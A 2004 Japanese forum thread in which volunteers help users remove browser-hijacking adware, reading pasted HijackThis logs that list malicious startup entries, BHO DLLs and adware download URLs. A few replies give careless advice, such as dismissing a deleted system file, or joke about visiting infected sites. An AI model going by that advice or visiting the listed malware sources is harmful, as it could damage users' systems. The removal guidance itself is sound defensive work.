http://www.selfsearch.bizになってしまうのと 「Media Tickets Installer」というアドウェアだけがなんど削除しても再生してしまいます。
どうしたらよいでしょうか?
新しいネタ、「迷惑ソフトの開発技術者」ですか
それにしても
>>129 只長いだけで、小学生みたいな文章だな
144 :
65 :04/08/30 19:28 ID:70gB2ZGH
皆様本当にどうも有り難うございました! どうやら修復できたみたいです。 一時はどうなってしまうのかと思いましたが、こうして無事に使用できる様になり本当にうれしいです。 重ね重ね有り難うございました!(*´∀`)
(=^・^=)喜んでもらえると嬉しいなりよ
146 :
65 :04/08/30 19:45 ID:g6KdlIyV
↑のような事を書き込んだのに、再起動したら復活していました‥
p://www.selfsearch.biz/が‥!
とりあえず、C:\\WINDOWS\\System32\\stobject.dllは削除しましたが、
テンプレにあるC:\WINDOWS\system.exeファイルがなかったので何もしなかったのですが、
やはりそれが原因でしょうか?
>>141 貴方の場合もありませんでしたか?もしまだいるようでしたら返事くれると嬉しいです。
147 :
ひよこ名無しさん :04/08/30 19:50 ID:o5JhaYld
>>146 俺も実家のPC(Me)が「ホーム」ボタン押すと同じサイトに飛ぶ。アイコン
開かなくなったが、何とか裏技使ってデジカメの貯蔵をUSB経由⇒自分の
ノート(XP)に逃がした。もうMeはダメっぽっく、初期化しようかと思案中
なんだが。どうしたものかね。
>>146 たしかファイル名は別の名前だったと思う。
149 :
65 :04/08/30 20:00 ID:70gB2ZGH
いろいろいじっていたら、WINDOWSフォルダの中にsystemと、system32というフォルダを発見しました。 名前が名前だけに削除に躊躇するのですが、諸悪の根元はこれらでいいのでしょうか?
>>149 (;・3・) エェー そりゃシステム最重要フォルダだYO…
>>149 逆。systemは重要だから、ウイルスがそれに似たsystem.exeを名乗ってるだけ。
ワラタ!stobject.dll消したのか?
>>146 どうしても直らなかったら、俺が最後に直してやるから心配するな
155 :
65 :04/08/30 20:08 ID:70gB2ZGH
ですがそうすると、問題だと思われるファイルが見あたらないのですが‥ どうすればいいのでしょうか?
あふぉ回答者にハメられたかw
(・3・) エェー だからwww.selfsearch.bizにアンインストーラあるJAN…
>>155 とりあえず勝手に削除したもの元に戻しておけ
160 :
ひよこ名無しさん :04/08/30 20:16 ID:wbR03piJ
,:::-、 __ ,,r::::::::::::〈:::::::::) ィ::::::ヽ 〃::::::::::::;r‐''´:::::::::::::::::::::ヽ::ノ ,'::;'::::::::::::::/:::::::::::::::::::::::::::::::::::: l::::::::::::::::::l::::::::::●::::::::::::::●:::::ji |::::::::::::::::::、::::::::::::::( _●_)::::::,j:l クマー! }::::::::::::::::::::ゝ、::::::::::|∪|_ノ::;! . {::::::::::::::::::::::::::::`='=::ヽノ:::::/ ';::::::::::::ト、::::::::::::::i^i::::::::::::/ `ー--' ヽ:::::::::::l l;;;;::::ノ
161 :
65 :04/08/30 20:19 ID:70gB2ZGH
>>153 そんな大事なファイルだったのですか!?
削除してしまったらどうすればいいのでしょうか‥
systemのその他のファイルは削除せずに済みました。
別に無くてもいいんじゃね?システムファイルだけど。
>>161 流れがわかんないから答えられないけど、いままで何をやったのか整理して書いとけよ。
テンプレ全部やったか?
>>161 心配すんな!
expandでいくらでも復元出来るし、
C:\WINDOWS\SYSTEM32\dllcache
ここにバックアップがあるだろ?
165 :
65 :04/08/30 20:36 ID:70gB2ZGH
>>158 一時は消えても、再起動するとまた復活してしまいます‥。
いったいどうすればいいのでしょうか?なんだか泣きたくなってきました。
>>165 (・3・) エェー もう面倒だからHijackthisのログ貼れBA? 誰か見てくれるYO
質問者に飢えてたんで丁度いいじゃんw
169 :
167 :04/08/30 20:43 ID:???
PC初心者板の回答者共、俺達の活躍を目に焼き付けろやぁ!!
次の患者来い!ぐへへ
質問者、気がついて逃げやがったな。
174 :
65 :04/08/30 21:02 ID:g6KdlIyV
>>167 それを使って、一度はアンインストールできるんですが、
再起動するとまた元に戻ってしまっているんです。
>>170 何も登録されていませんでした‥
ログをとったので貼ってもいいですか?
175 :
ひよこ名無しさん :04/08/30 21:02 ID:rS9grLOV
最初のページがおかしくなってしまったのでテンプレの応急処置の手順をやろうと思ったのですが 8のwindows updateをやらないと元には戻らないのでしょうか?
>>175 (・3・) エェー すでにおかしいのは直らないYO あれはむしろ転ばぬ先の杖ってことだYO
178 :
65 :04/08/30 21:07 ID:g6KdlIyV
それでは貼らせて頂きます。 StartupList report, 2004/08/30, 20:43:54 StartupList version: 1.52.2 Started from : C:\Documents and Settings\Uzer\デスクトップ\hijackthis\HijackThis.EXE Detected: Windows XP SP1 (WinNT 5.01.2600) Detected: Internet Explorer v6.00 SP1 (6.00.2800.1106) * Using default options * Showing rarely important sections ==================================================
180 :
65 :04/08/30 21:07 ID:g6KdlIyV
Running processes: C:\WINDOWS\System32\smss.exe C:\WINDOWS\system32\winlogon.exe C:\WINDOWS\system32\services.exe C:\WINDOWS\system32\lsass.exe C:\WINDOWS\system32\svchost.exe C:\WINDOWS\System32\svchost.exe C:\WINDOWS\system32\spoolsv.exe C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe C:\WINDOWS\Explorer.EXE C:\WINDOWS\System32\igfxtray.exe C:\WINDOWS\System32\hkcmd.exe C:\WINDOWS\System32\ezSP_Px.exe C:\WINDOWS\AGRSMMSG.exe C:\Program Files\Common Files\Symantec Shared\ccApp.exe C:\Program Files\MELCO INC\エアステーションユーティリティ
181 :
65 :04/08/30 21:08 ID:g6KdlIyV
\CLIENTMG\ABReceiver.exe C:\WINDOWS\System32\host32.exe C:\WINDOWS\System32\zktlzvo.exe C:\WINDOWS\System32\ctfmon.exe C:\Program Files\Sony\Giga Pocket\shwserv.exe C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe C:\Program Files\Messenger\msmsgs.exe C:\Documents and Settings\User\Application Data\meaa.exe C:\WINDOWS\System32\ndpoqr.exe C:\Program Files\Norton AntiVirus\navapsvc.exe C:\WINDOWS\System32\svchost.exe C:\WINDOWS\System32\Tablet.exe C:\Program Files\PenPlusパーソナル\PenHusen.exe C:\Program Files\Sony\VAIO Action Setup\VAServ.exe C:\Program Files\Sony\USBSircs\usbsircs.exe C:\Program Files\Sony\Giga Pocket\ReserveModule.exe C:\Program Files\Sony\Giga Pocket\gps.exe C:\Program Files\Sony\Giga Pocket\RM_SV.exe C:\WINDOWS\System32\printer32.exe C:\WINDOWS\System32\wuauclt.exe C:\WINDOWS\System32\conime.exe C:\Program Files\Live2ch\Live2ch.exe C:\WINDOWS\System32\DllHost.exe C:\Program Files\Internet Explorer\iexplore.exe C:\Documents and Settings\User\デスクトップ\hijackthis\HijackThis.exe --------------------------------------------------
182 :
65 :04/08/30 21:08 ID:g6KdlIyV
Listing of startup folders: Shell folders Common Startup: [C:\Documents and Settings\All Users\スタート メニュー\プログラム\スタートアップ] Adobe Gamma Loader.lnk = ? PenPlus手書きメモ.lnk = ? VAIO Action Setup (サーバー).lnk = ? リモコンドライバ.lnk = ? 予約マネージャー.lnk = C:\Program Files\Sony\Giga Pocket\ReserveModule.exe --------------------------------------------------
スタートアップリストじゃん
184 :
65 :04/08/30 21:09 ID:g6KdlIyV
Checking Windows NT UserInit: [HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon] UserInit = C:\WINDOWS\system32\userinit.exe, -------------------------------------------------- Autorun entries from Registry: HKLM\Software\Microsoft\Windows\CurrentVersion\Run IMJPMIG8.1 = "C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE" /Spoil /RemAdvDef /Migration32 PHIME2002ASync = C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /SYNC PHIME2002A = C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /IMEName IgfxTray = C:\WINDOWS\System32\igfxtray.exe HotKeysCmds = C:\WINDOWS\System32\hkcmd.exe StorageGuard = "C:\Program Files\VERITAS Software\Update Manager\sgtray.exe" /r
185 :
65 :04/08/30 21:09 ID:g6KdlIyV
i-FilterPE = C:\Program Files\Digital Arts\i-FilterPE\IfpeLaunch.exe ezShieldProtector for Px = C:\WINDOWS\System32\ezSP_Px.exe AGRSMMSG = AGRSMMSG.exe imjpmig = C:\Program Files\Common Files\Microsoft Shared\IME\IMJP\imjpmig.exe /RemAdvDef /AIMEREG /Migration /SetPreload ccApp = "C:\Program Files\Common Files\Symantec Shared\ccApp.exe" ccRegVfy = "C:\Program Files\Common Files\Symantec Shared\ccRegVfy.exe" IMEKRMIG6.1 = C:\WINDOWS\ime\imkr6_1\IMEKRMIG.EXE MSPY2002 = C:\WINDOWS\System32\IME\PINTLGNT\ImScInst.exe /SYNC ABRECEIVER = "C:\Program Files\MELCO INC\エアステーションユーティリティ\CLIENTMG\ABReceiver.exe" ControlPanel = C:\WINDOWS\System32\host32.exe internat.dll,LoadKeyboardProfile vevolxarcds = C:\WINDOWS\System32\zktlzvo.exe --------------------------------------------------
186 :
65 :04/08/30 21:10 ID:g6KdlIyV
具体的にどこを貼ればいいかよくわからなかったので‥ すいません。 一体どのあたりのを貼ればいいのですか?
やっぱテンプレやってねー
(・3・) エェー まぁたしかにろくでもないもん走ってるNE SCAN押したあとSAVE LOGだYO C:\WINDOWS\System32\host32.exe C:\WINDOWS\System32\zktlzvo.exe
>>186 スタータアップログでも出ているけど
その状態じゃ治せない。
ControlPanel = C:\WINDOWS\System32\host32.exe internat.dll,LoadKeyboardProfile
HijackThisを起動してScanして
04に登録されている[ControlPanel]を見つけてFixしたのちに再起動。
問題がなければhost32.exeをゴミ箱に移して、
もう一度テンプレを実行してゴミ掃除。
190 :
189 :04/08/30 21:20 ID:???
vevolxarcds = C:\WINDOWS\System32\zktlzvo.exe
04の[vevolxarcds]もです。
ぱっと見で見落としました。すみません。
やっぱり再起動して問題がなければzktlzvo.exeを、
ゴミ箱に移して様子を見てください。
>>188 さすがですね。
191 :
65 :04/08/30 21:23 ID:g6KdlIyV
とりあえずログ貼ってみます。 Logfile of HijackThis v1.98.2 Scan saved at 21:16:08, on 2004/08/30 Platform: Windows XP SP1 (WinNT 5.01.2600) MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106) Running processes: C:\WINDOWS\System32\smss.exe C:\WINDOWS\system32\winlogon.exe C:\WINDOWS\system32\services.exe C:\WINDOWS\system32\lsass.exe C:\WINDOWS\system32\svchost.exe C:\WINDOWS\System32\svchost.exe C:\WINDOWS\system32\spoolsv.exe C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe C:\WINDOWS\Explorer.EXE C:\WINDOWS\System32\igfxtray.exe C:\WINDOWS\System32\hkcmd.exe C:\WINDOWS\System32\ezSP_Px.exe C:\WINDOWS\AGRSMMSG.exe C:\Program Files\Common Files\Symantec Shared\ccApp.exe C:\Program Files\MELCO INC\エアステーションユーティリティ\CLIENTMG\ABReceiver.exe
192 :
65 :04/08/30 21:24 ID:g6KdlIyV
\CLIENTMG\ABReceiver.exe C:\WINDOWS\System32\host32.exe C:\WINDOWS\System32\zktlzvo.exe C:\WINDOWS\System32\ctfmon.exe C:\Program Files\Sony\Giga Pocket\shwserv.exe C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe C:\Program Files\Messenger\msmsgs.exe C:\Documents and Settings\ERIKO\Application Data\meaa.exe C:\WINDOWS\System32\ndpoqr.exe C:\Program Files\Norton AntiVirus\navapsvc.exe C:\WINDOWS\System32\svchost.exe C:\WINDOWS\System32\Tablet.exe C:\Program Files\PenPlusパーソナル\PenHusen.exe C:\Program Files\Sony\VAIO Action Setup\VAServ.exe C:\Program Files\Sony\USBSircs\usbsircs.exe C:\Program Files\Sony\Giga Pocket\ReserveModule.exe C:\Program Files\Sony\Giga Pocket\gps.exe C:\Program Files\Sony\Giga Pocket\RM_SV.exe C:\WINDOWS\System32\printer32.exe C:\WINDOWS\System32\wuauclt.exe C:\WINDOWS\System32\conime.exe C:\WINDOWS\system32\NOTEPAD.EXE C:\Documents and Settings\ERIKO\デスクトップ\hijackthis\HijackThis.exe
193 :
65 :04/08/30 21:25 ID:g6KdlIyV
O2 - BHO: LocalNRDObj Class - {00320615-B6C2-40A6-8F99-F1C52D674FAD} - C:\WINDOWS\localNRD.dll O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx O2 - BHO: (no name) - {39DF652E-CC4F-26E2-D505-11557CA07441} - C:\WINDOWS\System32\lsktmcol.dll O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll O2 - BHO: (no name) - {7B55BB05-0B4D-44fd-81A6-B136188F5DEB} - C:\WINDOWS\questmod.dll O2 - BHO: (no name) - {A3DFDA85-1D92-4E28-8C0C-522574ACDC8A} - C:\WINDOWS\System32\msacrohlp.dll O2 - BHO: NLS UrlCatcher Class - {AEECBFDA-12FA-4881-BDCE-8C3E1CE4B344} - C:\WINDOWS\System32\nvms.dll O2 - BHO: NAV Helper - {BDF3E430-B101-42AD-A544-FADC6B084872} - C:\Program Files\Norton AntiVirus\NavShExt.dll O2 - BHO: CB UrlCatcher Class - {CE188402-6EE7-4022-8868-AB25173A3E14} - C:\WINDOWS\System32\mscb.dll O2 - BHO: ADP UrlCatcher Class - {F4E04583-354E-4076-BE7D-ED6A80FD66DA} - C:\WINDOWS\System32\msbe.dll O3 - Toolbar: ラジオ(&R) - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx O3 - Toolbar: Norton AntiVirus - {42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} - C:\Program Files\Norton AntiVirus\NavShExt.dll
194 :
65 :04/08/30 21:26 ID:g6KdlIyV
O4 - HKLM\..\Run: [IMJPMIG8.1] "C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE" /Spoil /RemAdvDef /Migration32 O4 - HKLM\..\Run: [PHIME2002ASync] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /SYNC O4 - HKLM\..\Run: [PHIME2002A] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /IMEName O4 - HKLM\..\Run: [IgfxTray] C:\WINDOWS\System32\igfxtray.exe O4 - HKLM\..\Run: [HotKeysCmds] C:\WINDOWS\System32\hkcmd.exe O4 - HKLM\..\Run: [StorageGuard] "C:\Program Files\VERITAS Software\Update Manager\sgtray.exe" /r O4 - HKLM\..\Run: [i-FilterPE] C:\Program Files\Digital Arts\i-FilterPE\IfpeLaunch.exe O4 - HKLM\..\Run: [ezShieldProtector for Px] C:\WINDOWS\System32\ezSP_Px.exe O4 - HKLM\..\Run: [AGRSMMSG] AGRSMMSG.exe O4 - HKLM\..\Run: [imjpmig] C:\Program Files\Common Files\Microsoft Shared\IME\IMJP\imjpmig.exe /RemAdvDef /AIMEREG /Migration /SetPreload O4 - HKLM\..\Run: [ccApp] "C:\Program Files\Common Files\Symantec Shared\ccApp.exe" O4 - HKLM\..\Run: [ccRegVfy] "C:\Program Files\Common Files\Symantec Shared\ccRegVfy.exe" O4 - HKLM\..\Run: [IMEKRMIG6.1] C:\WINDOWS\ime\imkr6_1\IMEKRMIG.EXE O4 - HKLM\..\Run: [MSPY2002] C:\WINDOWS\System32\IME\PINTLGNT\ImScInst.exe /SYNC O4 - HKLM\..\Run: [ABRECEIVER] "C:\Program Files\MELCO INC\エアステーションユーティリティ\CLIENTMG\ABReceiver.exe" O4 - HKLM\..\Run: [ControlPanel] C:\WINDOWS\System32\host32.exe internat.dll,LoadKeyboardProfile O4 - HKLM\..\Run: [vevolxarcds] C:\WINDOWS\System32\zktlzvo.exe O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\System32\ctfmon.exe O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background O4 - HKCU\..\Run: [Bhao] C:\Documents and Settings\ERIKO\Application Data\meaa.exe O4 - HKCU\..\Run: [Vlru] C:\WINDOWS\System32\ndpoqr.exe
195 :
65 :04/08/30 21:27 ID:g6KdlIyV
O8 - Extra context menu item: Bookshelfで検索(&L) - res://C:\Program Files\Microsoft Reference\Microsoft Bookshelf 3.0\bsdef.dll/#1001
O8 - Extra context menu item: Microsoft Excel にエクスポート(&X) - res://C:\PROGRA~1\MICROS~2\Office10\EXCEL.EXE/3000
O14 - IERESET.INF: START_PAGE_URL=
http://www.vaio.sony.co.jp/ O15 - Trusted Zone: *.mt-download.com
O15 - Trusted Zone: *.my-internet.info
O15 - Trusted Zone: *.searchmeup.cc
O15 - Trusted Zone: *.searchmiracle.com
O15 - Trusted Zone: *.skoobidoo.com
O16 - DPF: v2cab -
http://searchmiracle.com/cab/v2cab.cab O16 - DPF: WebWorks Help 2.0 - file://C:\Program Files\procreate Painter Classic\Help\wwhelp2.cab
O16 - DPF: {29F5DFC6-6A4B-47DB-BCF4-5A74F7CBFF43} (HanGamePluginJP13 Class) -
http://www.hangame.co.jp/gamenc/HanGamePluginJP13.cab O16 - DPF: {B94B4225-E02E-4D3F-BADB-026F1E2F3AD7} (HttpDownloader Control) -
http://www.instantplugin.com/SexDownloader.cab
∧_∧ ( ・∀・) ドキドキ ( ∪ ∪ と__)__)
(=^u^=) 今、解析中なりよ。
(・3・) エェー 確定で要らないのが
O4 - HKLM\..\Run: [ControlPanel] C:\WINDOWS\System32\host32.exe internat.dll,LoadKeyboardProfile
O4 - HKLM\..\Run: [vevolxarcds] C:\WINDOWS\System32\zktlzvo.exe
O4 - HKCU\..\Run: [Bhao] C:\Documents and Settings\ERIKO\Application Data\meaa.exe
O4 - HKCU\..\Run: [Vlru] C:\WINDOWS\System32\ndpoqr.exe
O15 - Trusted Zone: *.mt-download.com
O15 - Trusted Zone: *.my-internet.info
O15 - Trusted Zone: *.searchmeup.cc
O15 - Trusted Zone: *.searchmiracle.com
O15 - Trusted Zone: *.skoobidoo.com
O16 - DPF: v2cab -
http://searchmiracle.com/cab/v2cab.cab O16 - DPF: {B94B4225-E02E-4D3F-BADB-026F1E2F3AD7} (HttpDownloader Control) -
http://www.instantplugin.com/SexDownloader.cab で ちょっとO2項目自信ないけど
O2 - BHO: LocalNRDObj Class - {00320615-B6C2-40A6-8F99-F1C52D674FAD} - C:\WINDOWS\localNRD.dll
O2 - BHO: (no name) - {39DF652E-CC4F-26E2-D505-11557CA07441} - C:\WINDOWS\System32\lsktmcol.dll
O2 - BHO: (no name) - {7B55BB05-0B4D-44fd-81A6-B136188F5DEB} - C:\WINDOWS\questmod.dll
O2 - BHO: (no name) - {A3DFDA85-1D92-4E28-8C0C-522574ACDC8A} - C:\WINDOWS\System32\msacrohlp.dll
O2 - BHO: NLS UrlCatcher Class - {AEECBFDA-12FA-4881-BDCE-8C3E1CE4B344} - C:\WINDOWS\System32\nvms.dll
O2 - BHO: CB UrlCatcher Class - {CE188402-6EE7-4022-8868-AB25173A3E14} - C:\WINDOWS\System32\mscb.dll
O2 - BHO: ADP UrlCatcher Class - {F4E04583-354E-4076-BE7D-ED6A80FD66DA} - C:\WINDOWS\System32\msbe.dll
あたり要らない気がするYO ちょっとこの辺見たことないYO
199 :
189 :04/08/30 21:40 ID:???
個人的にはこの辺りだと思いますが、
Fix前に優秀な人の意見も聞いた方がいいでしょう。
O2 - BHO: LocalNRDObj Class - {00320615-B6C2-40A6-8F99-F1C52D674FAD} - C:\WINDOWS\localNRD.dll
O2 - BHO: LocalNRDObj Class - {00320615-B6C2-40A6-8F99-F1C52D674FAD} - C:\WINDOWS\localNRD.dll
O2 - BHO: (no name) - {7B55BB05-0B4D-44fd-81A6-B136188F5DEB} - C:\WINDOWS\questmod.dll
O2 - BHO: (no name) - {A3DFDA85-1D92-4E28-8C0C-522574ACDC8A} - C:\WINDOWS\System32\msacrohlp.dll
O4 - HKLM\..\Run: [ControlPanel] C:\WINDOWS\System32\host32.exe internat.dll,LoadKeyboardProfile
O4 - HKLM\..\Run: [vevolxarcds] C:\WINDOWS\System32\zktlzvo.exe
O4 - HKCU\..\Run: [Bhao] C:\Documents and Settings\ERIKO\Application Data\meaa.exe
O4 - HKCU\..\Run: [Vlru] C:\WINDOWS\System32\ndpoqr.exe
O16 - DPF: v2cab -
ttp://searchmiracle.com/cab/v2cab.cab O16 - DPF: WebWorks Help 2.0 - file://C:\Program Files\procreate Painter Classic\Help\wwhelp2.cab
O15 コンパネから信頼済みを解除。
(・3・) エェー お疲れちゃん。
201 :
ひよこ名無しさん :04/08/30 21:41 ID:hhR6evKb
about:blank Search for型の対処法に 『画面上の適当な場所を右クリックして「ソースの表示」をクリックします。』 とありますが、右クリックがききません。 どうしたらいいですか?
203 :
189 :04/08/30 21:44 ID:???
O2 - BHO: NLS UrlCatcher Class - {AEECBFDA-12FA-4881-BDCE-8C3E1CE4B344} - C:\WINDOWS\System32\nvms.dll
O2 - BHO: CB UrlCatcher Class - {CE188402-6EE7-4022-8868-AB25173A3E14} - C:\WINDOWS\System32\mscb.dll
O2 - BHO: ADP UrlCatcher Class - {F4E04583-354E-4076-BE7D-ED6A80FD66DA} - C:\WINDOWS\System32\msbe.dll
自信がないのですがeXact Advertisingっと言うものかも知れないです。
上のリストに合わせて追加しておきます。
eXact Advertising
ttp://www.doxdesk.com/parasite/BargainBuddy.html
204 :
ひよこ名無しさん :04/08/30 21:46 ID:rS9grLOV
テンプレの通りにやっても最初のページは
ttp://selfsearch.bizになるし 一度電源切ってもう一度起動させたらスパイウェア一杯でおまけに削除できないやつもいて
もう混乱してるんですがどうしたらよいでしょうか?初期化も考えてますが・・・
>>203 リロードしてから書き込めよ、ぼるじょあ様に失礼だぞ。
206 :
65 :04/08/30 21:53 ID:g6KdlIyV
とりあえず皆様がfixしたほうがいいと おっしゃったものはしたのですが、 その後の処置をどうしたらいいのかよく分かりません… 再起動をしていいのですか?
207 :
189 :04/08/30 21:53 ID:???
>>200 &
>>205 申し訳ないです。
優秀な回答者がいっらっしゃるようですので
自分はどこかそこらをしばらく巡回してきます。
>>204 トラップを全て潰すために、セーフモードで起動したら、
IEの一時ファイルを削除
C:\TEMP内を削除
C:\WINDOWS\TEMP内を削除
C:\Documents and Settings\ユーザー名\Local Settings\Temp内を削除
そのまま、spybot Ad-Aware SE でスキャンして削除
通常モードで起動
全ての始まりはここから
210 :
189 :04/08/30 21:56 ID:???
>>206 再起動してコンパネのホームの場所を戻して、
様子を見てください。
問題がなければ、
host32.exe、zktlzvo.exe、meaa.exe、ndpoqr.exe
localNRD.dll、lsktmcol.dll、questmod.dll、msacrohlp.dll
nvms.dll、mscb.dll、msbe.dllをゴミ箱に移して、
念のためにもう一度テンプレを実行してゴミ掃除をしてください。
それでは落ちます。ノシ
(・3・) エェー まぁ
>>198 と
>>200 は別ぼるだけどNE 真面目な回答者は多い方が安心だYO
>>189 行かないで。
色々な人が回答するほうが、間違いが少ないし
違った角度で見れるから良いですよ。
それに「ぼるじょあ」は、そんな事に気を止めるほど
小さい団体さんじゃないしw
>>211 セキュ板のぼるスレでも回答者やってるの???
>>213 (・3・) エェー それは別のぼるだNE ボクはこの板以外で回答者はやってないYO
215 :
ひよこ名無しさん :04/08/30 22:11 ID:8ArhMKqH
Win98を使用しています。
「about:blank Search for」についてなんですが、
ブラウザの検索ボタンを押すと飛んでしまいます。
ブラウザを立ち上げたスタートアップ画面はそこへは飛ばないのですが。
そこでどっからはじめていいかわからないんですが、
>>2 の「WEB設定のリセット」
は「ホームパージもリセットする」にチェックを入れたほうがよろしいのでしょうか?
あとアンチウィルスソフトやアンチスパイソフトをインストールするにあたっては
メモリを増設したりWinのアップデートが必要なのでしょうか?
どっから手をつけていいかわかりません。
>>215 (・3・) エェー 前半はYes 後半はNo でもWinのアップデートはするべきだYO
ただ最近のアンチウィルス結構動作重いから 98頃のPCだと大変かもYO
>>216 セキュ板のぼるちゃんに騙されてたよ _| ̄|○
218 :
65 :04/08/30 22:20 ID:g6KdlIyV
zktlzvo.exeをゴミ箱に移そうとすると、ほかのプログラムで使用中のため 削除できないと言われてしまいます。 また、meaa.exe、localNRD.dll、questmod.dllのファイルが見つからないのですが、 その場合放置でも大丈夫ですが?
>>218 確か見つからない場合は放置で大丈夫
使用中の場合はセーフモードで削除すれば
その問題を回避できる場合がある
セーフモードは起動後ロゴ表示中F8押しっぱなし
220 :
219 :04/08/30 22:28 ID:???
>>218 補足ごめん
上の説明はファイルの表示を全て表示にされている場合
コントロールパネルの表示で
1:ファイルとフォルダの表示が「すべての・・・」にチェック
2:保護されたオペレーティング・・・のチェックを外す
まずこちらを確認してからにしてくれ。
222 :
ひよこ名無しさん :04/08/30 22:44 ID:VWuuLoH9
お願いします。 ブラウザを開くと、アドレスバーの下になんか別の英語の検索バーが出ます。 どうすればよぃのでしょうか?
>>222 (・3・) エェー 見なかったことにして別ブラウザを使う
というかまずテンプレ読んで実行しろYO
224 :
65 :04/08/30 23:20 ID:g6KdlIyV
どうやら今度こそ本当に直ったみたいです!! ここの皆様には本当に感謝してもしたりないです‥(つд`) 今無事でいるのが信じられません。 これからは気をつけます‥それでは。
直ちゃったんか、また来いよ。
ホームページがgreatsearch.biz/になってしまいます。 テンプレは全てやりましたが、直ってません。 まだやり残したことはありますか?
231 :
228 :04/08/30 23:40 ID:???
>>229 >>230 らーめんとカレーを食べたら今度はsearch forになってしまいました。
誰か助けて〜〜
233 :
215 :04/08/30 23:46 ID:8ArhMKqH
>>2 >>2 )クッキーの削除+ファイルの削除
クッキーの削除のボタンがないのですがどうすればいいんですか?
>>233 (・3・) エェー IEのバージョン古いとないYO 直接cookieフォルダの中身削除だYO
>>233 ∩___∩
| ノ ヽ/⌒) きゃははははゲラゲラゲラ〜〜〜
/⌒) (゚) (゚) | .|
/ / ( _●_) ミ/ ∩―−、
.( ヽ |∪| / / (゚) 、_ `ヽ
\ ヽノ / / ( ● (゚) |つ
/ / | /(入__ノ ミ ざまみろ ざまあみろ ざまーみろ
| / 、 (_/ ノ
| /\ \ \___ ノ゙ ─ー
| / ) ) \ _
∪ ( \ \ \
>>231 別な直し方を教えてやる
spybotの左側のメニューからツールを選択して、
右側に表示されているスタートページをクリックすると
登録されているスタートページのアドレスが全部表示されるから、
右クリックしてクリップボードにコピーして、メモ帳に貼り付ける。
登録されているレジストリキーの場所がわかるから
該当アドレスを削除する。
237 :
ひよこ名無しさん :04/08/30 23:54 ID:p2fNgJBA
Mozilla Firebird 0.7でエロサイトを見ていたら、いつの間にか、IEが使えなくなっていました。 起動させるとすぐに閉じてしまうのです。 さらに、「スタートメニュー」から、マイドキュメントや コントロールパネルを開くこともできなくなっていました。 ためしに、Windows XPをインストールしなおしてみたのですが、全く効果がなく、 それをしたばっかりに、以前の「復元ポイント」まで消滅してしまいました。 何か対処法はないものでしょうか?
238 :
236 :04/08/30 23:55 ID:???
スタートページ ----> ブラウザページ
240 :
228 :04/08/30 23:56 ID:???
いろいろありがとう。 けど、逆にsearch for使ってエロサイト見ることにしたので直さないことにしました。 ばいばい、このスレでレスを待っている人。
釣ろうとしたけど誰も相手にしてくれないのってさみしいよね (ノ∀`)アチャー
俺達のテンプレは日本一だぜ。
(・3・) エェー 釣り師、地雷師、大歓迎ですYO
何かやることはないのか?
246 :
215 :04/08/31 00:05 ID:fSohiFAY
252 :
236 :04/08/31 00:12 ID:???
>>246 index.dat
これは、OSで使用中だから、それ以外のを選択して全部削除しろ
>>254 相手してもらえないと淋しいのか。
そんな時は、たぬたんに遊んでもらえ。
256 :
237 :04/08/31 00:43 ID:QDK/x+Zt
>>256 テンプレサイトは、情報をごっちゃごちゃに集めただけの使えないサイト
このスレの
>>2-5 の順番でやればいいだけ
>>256 XPはIEのコンポーネントがぶっ壊れていても、エクスプローラーが使えなくなることはないので、
あなたは直らないかもしれない
>>261 今日加わった、迷惑ソフトの開発技術者かもしれないぞ
266 :
129 :04/08/31 01:42 ID:???
>>265 それはあんまりだ。俺だって立派な被害者だぜ。
確かに、俺を怒らせるとひどい目にあうといわれている危険人物だが。
その俺だって、アダルトサイトの対策に日夜努力している。
20G以上もエロ画像を収集した実績はあるが、奴らにはかなわない。
悪い奴らの中にも天才と言われる奴がいるが、まさに奴はそんな悪党だ。
267 :
266 :04/08/31 01:48 ID:???
訂正する、20GB以上ではなくて、正確には25,7GBあった。
269 :
266 :04/08/31 01:55 ID:???
こんな俺も、9月に成ったら小学校が始まる、鬱であった。
>>272 多分ほとんどが安全だが、中に地雷が仕組まれている。
>>271 笑った、被害にあってやってきた人間は、またこんなところで被害にはあわない。
実力のある人間だけが堂々とクリックする、削るなんて失礼な。
何か踏みたくなってきたw
>>274 踏んじゃえ、踏んじゃえ
ここなら、病院の前で交通事故に逢ったようなもんだから
病院が藪もしくは医者がモグリかもしれんがw
>>274 さすが貴方は偉い、そうでなければ実力者とはいえない。
患者はこないかな!何て言っている回答者は、自ら体験し まず患者の身になる
ことも大切だよ。患者の痛みを分からない回答者は、本当の回答者になれない、
偽者でしかない。回答なんてまやかしだ。
279 :
275 :04/08/31 02:24 ID:???
>>276 藪医者というのは、訂正します。
関係者の皆様失礼しました。orz
俺、ここで助けて貰った事があるので
余り悪くいえないんだよね
280 :
266 :04/08/31 02:29 ID:???
といゆう事は、今ここに居るのは全員被害者なのか??
282 :
266 :04/08/31 02:40 ID:???
284 :
281 :04/08/31 02:43 ID:???
俺は善意の第三者だよぉ〜
>>273 ああ、確かにそのページのリンク先はスクリプトを実行するとやばそうな所ばかりだわな
もろ、制限付きサイトばかりだわ
わざわざ制限外しても、どうせIframeなんだろうから、詰まらないのでパス
286 :
283 :04/08/31 02:46 ID:???
>>281 被害者と言うより、わざと感染させて検証した研究者
>>285 さすがインフォメーションでつまらないとは、名医だよ。
専属医に推薦する。
めっさツマラン日だゎ
